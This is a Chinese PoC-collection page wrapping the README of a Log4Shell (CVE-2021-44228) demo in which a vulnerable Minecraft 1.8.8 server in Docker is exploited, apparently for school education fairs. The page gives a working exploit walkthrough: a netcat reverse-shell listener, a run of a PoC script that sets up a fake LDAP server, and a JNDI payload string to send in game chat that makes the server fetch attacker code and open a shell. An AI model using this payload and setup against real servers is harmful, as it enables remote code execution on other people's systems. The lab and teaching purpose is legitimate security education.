POC详情: 6963bb0571419f1998cec29856192d6dda3c7412

来源
https://github.com/felixslama/log4shell-minecraft-demo
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
Log4Shell (CVE-2021-44228) minecraft demo. Used for education fairs
介绍
# Log4Shell (CVE-2021-44228) minecraft demo
This demo is used at education fairs to give potential future students an idea of the cybersecurity department at HTL Villach and on how everyday applications can be exploited


**Note:** This entire demo uses Minecraft 1.8.8
## Attacker
The attacker in this scenario is using the PoC by kozmer. https://github.com/kozmer/log4j-shell-poc
All credit belongs to them. 
**Note:** All commands need to be executed in attacker/

#### Requirements:
```bash
pip install -r requirements.txt
```
#### Usage:


* Start a netcat listener to accept reverse shell connection.<br>
```py
nc -lvnp 9001
```
* Launch the exploit.<br>
**Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20`, and be in the same directory. 
```py
$ python3 poc.py --userip <ip of docker-host> --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<ip of docker-host>:1389/a}

Listening on 0.0.0.0:1389
```


This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.

<br>

## Victim
On the victim instance we are using an outdated and therefore [vulnerable version of JDK (jdk1.8.0_20) ](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).

#### Initial setup


To get our Minecraft server running we have to build our Docker image and run it.

**Note:** For a successful build you need to obtain your own copy of the Minecraft Vanilla 1.8.8 Server *(can't be shared because of Mojang's EULA)*
A possible source could be [MCVERSIONS.NET](https://mcversions.net/download/1.8.8)

After obtaining the file save it in victim/ as server.jar 

```docker
cd target/
docker build target/ -t minecraft-demo
```

#### Running the vulnerable server
Run the vulnerable Minecraft server we just built using docker
```
docker run --name vulnerable-server -p 25565:25565 minecraft-demo
```
It's likely that your container freezes or gets stuck after exploitation. In that case you can kill it using the following command:
```
docker kill vulnerable-server
```

#### Exploiting the server

To exploit the vulnerabilty simply send the string provided by the *poc.py* in the game chat.
```
${jndi:ldap://<ip of docker-host>:1389/a}
```
![image](https://github.com/felixslama/log4shell-minecraft-demo/assets/79058712/b3cc9c19-ca14-456c-bf7f-7246bb6adf58)
文件快照

 [4.0K]  /data/pocs/6963bb0571419f1998cec29856192d6dda3c7412
├── [4.0K]  attacker
│   ├── [4.1K]  poc.py
│   ├── [  17]  requirements.txt
│   └── [4.0K]  target
│       ├── [1.8M]  log4shell-1.0-SNAPSHOT.war
│       └── [ 41M]  marshalsec-0.0.3-SNAPSHOT-all.jar
├── [1.0K]  LICENSE
├── [2.6K]  README.md
└── [4.0K]  victim
    └── [ 295]  Dockerfile

3 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。